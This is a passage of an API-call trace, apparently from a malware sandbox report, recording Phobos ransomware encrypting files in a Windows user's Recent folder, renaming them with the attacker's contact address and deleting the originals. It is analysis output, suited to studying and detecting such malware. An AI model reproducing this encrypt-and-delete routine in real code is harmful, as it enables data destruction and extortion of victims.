CryptSetKeyParam (hKey=0xa328e8, dwParam=0x1, pbData=0x2e0f9b0, dwFlags=0x0) returned 1 [0200.283] CryptEncrypt (in: hKey=0xa328e8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3070020*, pdwDataLen=0x2e0f8c8*=0x40, dwBufLen=0x40 | out: pbData=0x3070020*, pdwDataLen=0x2e0f8c8*=0x40) returned 1 [0200.283] CryptDestroyKey (hKey=0xa328e8) returned 1 [0200.283] WriteFile (in: hFile=0xac, lpBuffer=0x3070020*, nNumberOfBytesToWrite=0xf2, lpNumberOfBytesWritten=0x2e0f910, lpOverlapped=0x0 | out: lpBuffer=0x3070020*, lpNumberOfBytesWritten=0x2e0f910*=0xf2, lpOverlapped=0x0) returned 1 [0200.283] CryptDestroyKey (hKey=0xa32868) returned 1 [0200.283] CloseHandle (hObject=0x160) returned 1 [0200.283] CloseHandle (hObject=0xac) returned 1 [0200.283] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\cE4b_.lnk" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\windows\\recent\\ce4b_.lnk")) returned 1 [0200.284] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2e0f9b0 | out: pbBuffer=0x2e0f9b0) returned 1 [0200.284] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\cFAWLKyfz_nZthT6X.lnk" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\windows\\recent\\cfawlkyfz_nztht6x.lnk"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xac [0200.285] GetFileSizeEx (in: hFile=0xac, lpFileSize=0x2e0f950 | out: lpFileSize=0x2e0f950*=5301) returned 1 [0200.285] CloseHandle (hObject=0xac) returned 1 [0200.285] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\cFAWLKyfz_nZthT6X.lnk" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\windows\\recent\\cfawlkyfz_nztht6x.lnk")) returned 0x20 [0200.286] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\cFAWLKyfz_nZthT6X.lnk.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\windows\\recent\\cfawlkyfz_nztht6x.lnk.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0200.286] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\cFAWLKyfz_nZthT6X.lnk" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\windows\\recent\\cfawlkyfz_nztht6x.lnk"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xac [0200.286] SetFilePointerEx (in: hFile=0xac, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2e0f8f0 | out: lpNewFilePointer=0x0) returned 1 [0200.286] SetFilePointerEx (in: hFile=0xac, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2e0f8f0 | out: lpNewFilePointer=0x0) returned 1 [0200.286] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\cFAWLKyfz_nZthT6X.lnk.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\windows\\recent\\cfawlkyfz_nztht6x.lnk.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x160 [0200.286] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2e0f8a8, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2e0f904 | out: phKey=0x2e0f904*=0xa32868) returned 1 [0200.286] CryptSetKeyParam (hKey=0xa32868, dwParam=0x1, pbData=0x2e0f9b0, dwFlags=0x0) returned 1 [0200.287] ReadFile (in: hFile=0xac, lpBuffer=0x3070020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x2e0f92c, lpOverlapped=0x0 | out: lpBuffer=0x3070020*, lpNumberOfBytesRead=0x2e0f92c*=0x14b5, lpOverlapped=0x0) returned 1 [0200.288] CryptEncrypt (in: hKey=0xa32868, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3070020*, pdwDataLen=0x2e0f8c8*=0x14c0, dwBufLen=0x14c0 | out: pbData=0x3070020*, pdwDataLen=0x2e0f8c8*=0x14c0) returned 1 [0200.288] WriteFile (in: hFile=0x160, lpBuffer=0x3070020*, nNumberOfBytesToWrite=0x14c0, lpNumberOfBytesWritten=0x2e0f910, lpOverlapped=0x0 | out: lpBuffer=0x3070020*, lpNumberOfBytesWritten=0x2e0f910*=0x14c0, lpOverlapped=0x0) returned 1 [0200.289] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2e0f89c, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2e0f908 | out: phKey=0x2e0f908*=0xa328e8) returned 1 [0200.289] CryptSetKeyParam (hKey=0xa328e8, dwParam=0x1, pbData=0x2e0f9b0, dwFlags=0x0) returned 1 [0200.289] CryptEncrypt (in: hKey=0xa328e8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3070020*, pdwDataLen=0x2e0f8c8*=0x50, dwBufLen=0x50 | out: pbData=0x3070020*, pdwDataLen=0x2e0f8c8*=0x50) returned 1 [0200.289] CryptDestroyKey (hKey=0xa328e8) returned 1 [0200.289] WriteFile (in: hFile=0x160, lpBuffer=0x3070020*, nNumberOfBytesToWrite=0x102, lpNumberOfBytesWritten=0x2e0f910, lpOverlapped=0x0 | out: lpBuffer=0x3070020*, lpNumberOfBytesWritten=0x2e0f910*=0x102, lpOverlapped=0x0) returned 1 [0200.289] CryptDestroyKey (hKey=0xa32868) returned 1 [0200.289] CloseHandle (hObject=0xac) returned 1 [0200.289] CloseHandle (hObject=0x160) returned 1 [0200.289] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\cFAWLKyfz_nZthT6X.lnk" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\windows\\recent\\cfawlkyfz_nztht6x.lnk")) returned 1 [0200.290] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2e0f9b0 | out: pbBuffer=0x2e0f9b0) returned 1 [0200.290] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\clAsttDrcm.lnk" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\windows\\recent\\clasttdrcm.lnk"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x160 [0200.291] GetFileSizeEx (in: hFile=0x160, lpFileSize=0x2e0f950 | out: lpFileSize=0x2e0f950*=1010) returned 1 [0200.292] CloseHandle (hObject=0x160) returned 1 [0200.292] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\clAsttDrcm.lnk" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\windows\\recent\\clasttdrcm.lnk")) returned 0x20 [0200.292] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\clAsttDrcm.lnk.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\windows\\recent\\clasttdrcm.lnk.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0200.292] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\clAsttDrcm.lnk" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\windows\\recent\\clasttdrcm.lnk"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x160 [0200.292] SetFilePointerEx (in: hFile=0x160, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2e0f8f0 | out: lpNewFilePointer=0x0) returned 1 [0200.292] SetFilePointerEx (in: hFile=0x160, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2e0f8f0 | out: lpNewFilePointer=0x0) returned 1 [0200.292] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\clAsttDrcm.lnk.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\windows\\recent\\clasttdrcm.lnk.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xac [0200.293] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2e0f8a8, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2e0f904 | out: phKey=0x2e0f904*=0xa32868) returned 1 [0200.293] CryptSetKeyParam (hKey=0xa32868, dwParam=0x1, pbData=0x2e0f9b0, dwFlags=0x0) returned 1 [0200.293] ReadFile (in: hFile=0x160, lpBuffer=0x3070020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x2e0f92c, lpOverlapped=0x0 | out: lpBuffer=0x3070020*, lpNumberOfBytesRead=0x2e0f92c*=0x3f2, lpOverlapped=0x0) returned 1 [0200.445] CryptEncrypt (in: hKey=0xa32868, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3070020*, pdwDataLen=0x2e0f8c8*=0x400, dwBufLen=0x400 | out: pbData=0x3070020*, pdwDataLen=0x2e0f8c8*=0x400) returned 1 [0200.445] WriteFile (in: hFile=0xac, lpBuffer=0x3070020*, nNumberOfBytesToWrite=0x400, lpNumberOfBytesWritten=0x2e0f910, lpOverlapped=0x0 | out: lpBuffer=0x3070020*, lpNumberOfBytesWritten=0x2e0f910*=0x400, lpOverlapped=0x0) returned 1 [0200.446] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2e0f89c, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2e0f908 | out: phKey=0x2e0f908*=0xa32a28) returned 1 [0200.446] CryptSetKeyParam (hKey=0xa32a28, dwParam=0x1, pbData=0x2e0f9b0, dwFlags=0x0) returned 1 [0200.446] CryptEncrypt (in: hKey=0xa32a28, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3070020*, pdwDataLen=0x2e0f8c8*=0x40, dwBufLen=0x40 | out: pbData=0x3070020*, pdwDataLen=0x2e0f8c8*=0x40) returned 1 [0200.446] CryptDestroyKey (hKey=0xa32a28) returned 1 [0200.446] WriteFile (in: hFile=0xac, lpBuffer=0x3070020*, nNumberOfBytesToWrite=0xf2, lpNumberOfBytesWritten=0x2e0f910, lpOverlapped=0x0 | out: lpBuffer=0x3070020*, lpNumberOfBytesWritten=0x2e0f910*=0xf2, lpOverlapped=0x0) returned 1 [0200.446] CryptDestroyKey (hKey=0xa32868) returned 1 [0200.446] CloseHandle (hObject=0x160) returned 1 [0200.447] CloseHandle (hObject=0xac) returned 1 [0200.447] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\clAsttDrcm.lnk" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\windows\\recent\\clasttdrcm.lnk")) returned 1 [0200.448] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2e0f9b0 | out: pbBuffer=0x2e0f9b0) returned 1 [0200.448] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\CustomDestinations\\1b4dd67f29cb1962.customDestinations-ms" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\windows\\recent\\customdestinations\\1b4dd67f29cb1962.customdestinations-ms"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xac [0200.449] GetFileSizeEx (in: hFile=0xac, lpFileSize=0x2e0f950 | out: lpFileSize=0x2e0f950*=24) returned 1 [0200.449] CloseHandle (hObject=0xac) returned 1 [0200.449] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\CustomDestinations\\1b4dd67f29cb1962.customDestinations-ms" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\windows\\recent\\customdestinations\\1b4dd67f29cb1962.customdestinations-ms")) returned 0x20 [0200.449] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\CustomDestinations\\1b4dd67f29cb1962.customDestinations-ms.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\windows\\recent\\customdestinations\\1b4dd67f29cb1962.customdestinations-ms.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0200.449] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\CustomDestinations\\1b4dd67f29cb1962.customDestinations-ms" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\windows\\recent\\customdestinations\\1b4dd67f29cb1962.customdestinations-ms"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xac [0200.449] SetFilePointerEx (in: hFile=0xac, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2e0f8f0 | out: lpNewFilePointer=0x0) returned 1 [0200.449] SetFilePointerEx (in: hFile=0xac, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2e0f8f0 | out: lpNewFilePointer=0x0) returned 1 [0200.449] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\CustomDestinations\\1b4dd67f29cb1962.customDestinations-ms.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\windows\\recent\\customdestinations\\1b4dd67f29cb1962.customdestinations-ms.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x160 [0200.450] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2e0f8a8, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2e0f904 | out: phKey=0x2e0f904*=0xa32868) returned 1 [0200.450] CryptSetKeyParam (hKey=0xa32868, dwParam=0x1, pbData=0x2e0f9b0, dwFlags=0x0) returned 1 [0200.450] ReadFile (in: hFile=0xac, lpBuffer=0x3070020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x2e0f92c, lpOverlapped=0x0 | out: lpBuffer=0x3070020*, lpNumberOfBytesRead=0x2e0f92c*=0x18, lpOverlapped=0x0) returned 1 [0200.451] CryptEncrypt (in: hKey=0xa32868, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3070020*, pdwDataLen=0x2e0f8c8*=0x20, dwBufLen=0x20 | out: pbData=0x3070020*, pdwDataLen=0x2e0f8c8*=0x20) returned 1 [0200.451] WriteFile (in: hFile=0x160, lpBuffer=0x3070020*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x2e0f910, lpOverlapped=0x0 | out: lpBuffer=0x3070020*, lpNumberOfBytesWritten=0x2e0f910*=0x20, lpOverlapped=0x0) returned 1 [0200.453] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2e0f89c, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2e0f908 | out: phKey=0x2e0f908*=0xa32a28) returned 1 [0200.453] CryptSetKeyParam (hKey=0xa32a28, dwParam=0x1, pbData=0x2e0f9b0, dwFlags=0x0) returned 1 [0200.453] CryptEncrypt (in: hKey=0xa32a28, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3070020*, pdwDataLen=0x2e0f8c8*=0x70, dwBufLen=0x70 | out: pbData=0x3070020*, pdwDataLen=0x2e0f8c8*=0x70) returned 1 [0200.453] CryptDestroyKey (hKey=0xa32a28) returned 1 [0200.453] WriteFile (in: hFile=0x160, lpBuffer=0x3070020*, nNumberOfBytesToWrite=0x122, lpNumberOfBytesWritten=0x2e0f910, lpOverlapped=0x0 | out: lpBuffer=0x3070020*, lpNumberOfBytesWritten=0x2e0f910*=0x122, lpOverlapped=0x0) returned 1 [0200.453] CryptDestroyKey (hKey=0xa32868) returned 1 [0200.453] CloseHandle (hObject=0xac) returned 1 [0200.453] CloseHandle (hObject=0x160) returned 1 [0200.453] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\CustomDestinations\\1b4dd67f29cb1962.customDestinations-ms" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\windows\\recent\\customdestinations\\1b4dd67f29cb1962.customdestinations-ms")) returned 1 [0200.454] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2e0f9b0 | out: pbBuffer=0x2e0f9b0) returned 1 [0200.454] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\CustomDestinations\\590aee7bdd69b59b.customDestinations-ms" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\windows\\recent\\customdestinations\\590aee7bdd69b59b.customdestinations-ms"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x160 [0200.455] GetFileSizeEx (in: hFile=0x160, lpFileSize=0x2e0f950 | out: lpFileSize=0x2e0f950*=8040) returned 1 [0200.455] CloseHandle (hObject=0x160) returned 1 [0200.455] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\CustomDestinations\\590aee7bdd69b59b.customDestinations-ms" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\windows\\recent\\customdestinations\\590aee7bdd69b59b.customdestinations-ms")) returned 0x20 [0200.455] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\CustomDestinations\\590aee7bdd69b59b.customDestinations-ms.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\windows\\recent\\customdestinations\\590aee7bdd69b59b.customdestinations-ms.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0200.455] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\CustomDestinations\\590aee7bdd69b59b.customDestinations-ms" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\windows\\recent\\customdestinations\\590aee7bdd69b59b.customdestinations-ms"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x160 [0200.455] SetFilePointerEx (in: hFile=0x160, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2e0f8f0 | out: lpNewFilePointer=0x0) returned 1 [0200.455] SetFilePointerEx (in: hFile=0x160, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2e0f8f0 | out: lpNewFilePointer=0x0) returned 1 [0200.455] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\CustomDestinations\\590aee7bdd69b59b.customDestinations-ms.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\windows\\recent\\customdestinations\\590aee7bdd69b59b.customdestinations-ms.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xac [0200.456] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2e0f8a8, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2e0f904 | out: phKey=0x2e0f904*=0xa32868) returned 1 [0200.456] CryptSetKeyParam (hKey=0xa32868, dwParam=0x1, pbData=0x2e0f9b0, dwFlags=0x0) returned 1 [0200.456] ReadFile (in: hFile=0x160, lpBuffer=0x3070020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x2e0f92c, lpOverlapped=0x0 | out: lpBuffer=0x3070020*, lpNumberOfBytesRead=0x2e0f92c*=0x1f68, lpOverlapped=0x0) returned 1 [0200.458] CryptEncrypt (in: hKey=0xa32868, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3070020*, pdwDataLen=0x2e0f8c8*=0x1f70, dwBufLen=0x1f70 | out: pbData=0x3070020*, pdwDataLen=0x2e0f8c8*=0x1f70) returned 1 [0200.458] WriteFile (in: hFile=0xac, lpBuffer=0x3070020*, nNumberOfBytesToWrite=0x1f70, lpNumberOfBytesWritten=0x2e0f910, lpOverlapped=0x0 | out: lpBuffer=0x3070020*, lpNumberOfBytesWritten=0x2e0f910*=0x1f70, lpOverlapped=0x0) returned 1 [0200.458] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2e0f89c, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2e0f908 | out: phKey=0x2e0f908*=0xa32a28) returned 1 [0200.458] CryptSetKeyParam (hKey=0xa32a28, dwParam=0x1, pbData=0x2e0f9b0, dwFlags=0x0) returned 1 [0200.459] CryptEncrypt (in: hKey=0xa32a28, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3070020*, pdwDataLen=0x2e0f8c8*=0x70, dwBufLen=0x70 | out: pbData=0x3070020*, pdwDataLen=0x2e0f8c8*=0x70) returned 1 [0200.459] CryptDestroyKey (hKey=0xa32a28) returned 1 [0200.459] WriteFile (in: hFile=0xac, lpBuffer=0x3070020*, nNumberOfBytesToWrite=0x122, lpNumberOfBytesWritten=0x2e0f910, lpOverlapped=0x0 | out: lpBuffer=0x3070020*, lpNumberOfBytesWritten=0x2e0f910*=0x122, lpOverlapped=0x0) returned 1 [0200.459] CryptDestroyKey (hKey=0xa32868) returned 1 [0200.459] CloseHandle (hObject=0x160) returned 1 [0200.459] CloseHandle (hObject=0xac) returned 1 [0200.459] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\CustomDestinations\\590aee7bdd69b59b.customDestinations-ms" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\windows\\recent\\customdestinations\\590aee7bdd69b59b.customdestinations-ms")) returned 1 [0200.460] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2e0f9b0 | out: pbBuffer=0x2e0f9b0) returned 1 [0200.460] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\CustomDestinations\\5afe4de1b92fc382.customDestinations-ms" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\windows\\recent\\customdestinations\\5afe4de1b92fc382.customdestinations-ms"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xac [0200.461] GetFileSizeEx (in: hFile=0xac, lpFileSize=0x2e0f950 | out: lpFileSize=0x2e0f950*=17315) returned 1 [0200.461] CloseHandle (hObject=0xac) returned 1 [0200.461] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\CustomDestinations\\5afe4de1b92fc382.customDestinations-ms" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\windows\\recent\\customdestinations\\5afe4de1b92fc382.customdestinations-ms")) returned 0x20 [0200.461] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\CustomDestinations\\5afe4de1b92fc382.customDestinations-ms.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\windows\\recent\\customdestinations\\5afe4de1b92fc382.customdestinations-ms.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0200.461] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\CustomDestinations\\5afe4de1b92fc382.customDestinations-ms" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\windows\\recent\\customdestinations\\5afe4de1b92fc382.customdestinations-ms"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xac [0200.461] SetFilePointerEx (in: hFile=0xac, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2e0f8f0 | out: lpNewFilePointer=0x0) returned 1 [0200.461] SetFilePointerEx (in: hFile=0xac, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2e0f8f0 | out: lpNewFilePointer=0x0) returned 1 [0200.461] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\CustomDestinations\\5afe4de1b92fc382.customDestinations-ms.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\windows\\recent\\customdestinations\\5afe4de1b92fc382.customdestinations-ms.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x160 [0200.462] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2e0f8a8, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2e0f904 | out: phKey=0x2e0f904*=0xa32868) returned 1 [0200.462] CryptSetKeyParam (hKey=0xa32868, dwParam=0x1, pbData=0x2e0f9b0, dwFlags=0x0) returned 1 [0200.462] ReadFile (in: hFile=0xac, lpBuffer=0x3070020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x2e0f92c, lpOverlapped=0x0 | out: 